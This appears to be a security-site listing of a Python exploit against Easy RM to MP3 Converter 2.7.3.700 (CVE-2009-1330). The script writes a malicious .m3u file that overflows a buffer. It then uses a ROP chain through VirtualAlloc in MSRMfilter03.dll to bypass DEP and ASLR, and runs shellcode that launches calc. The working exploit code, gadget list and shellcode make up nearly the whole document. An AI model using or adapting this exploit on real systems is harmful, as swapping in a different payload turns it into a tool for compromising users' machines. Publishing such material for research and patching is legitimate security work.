Easy RM To MP3 Converter 2.7.3.700 Universal DEP + ASLR Bypass

2016.06.14
Credit: Csaba Fitzl
Risk: High
Local: Yes
Remote: No
CVE: CVE-2009-1330
CWE: N/A


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass # Date: 2016-06-12 # Exploit Author: Csaba Fitzl # Vendor Homepage: N/A # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 x64 # CVE : CVE-2009-1330 import struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be # added missing parts, and some optimisation by Csaba Fitzl rop_gadgets = [ #mov 1000 to EDX - Csaba 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x10025a1c, # XOR EDX,EDX # RETN 0x1002bc3d, # MOV EAX,411 # RETN 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc24, # ADD EAX,80 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1002dc41, # ADD EAX,40 # POP EBP # RETN 0x41414141, # Filler (compensate) 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x1001d2ac, # ADD EAX,4 # RETN 0x10023327, # INC EAX # RETN 0x10023327, # INC EAX # RETN 0x10023327, # INC EAX # RETN # AT this point EAX = 0x1000 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI 0x41414141, # Filler (compensate) 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] 0x1001b058, # & push esp # ret [MSRMfilter03.dll] 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) 0x1001d2ac, # ADD EAX,4 # RETN 0x10023327, # INC EAX # RETN 0x10023327, # INC EAX # RETN 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] 0xffffffff, # 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) buffersize = 26090 junk = "A" * buffersize eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN rop = create_rop_chain() calc = ( "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64" "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B" "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20" "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07" "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74" "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7") shell = "\x90"*0x10 + calc exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell)) filename = "list.m3u" textfile = open(filename , 'w') textfile.write(exploit) textfile.close()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top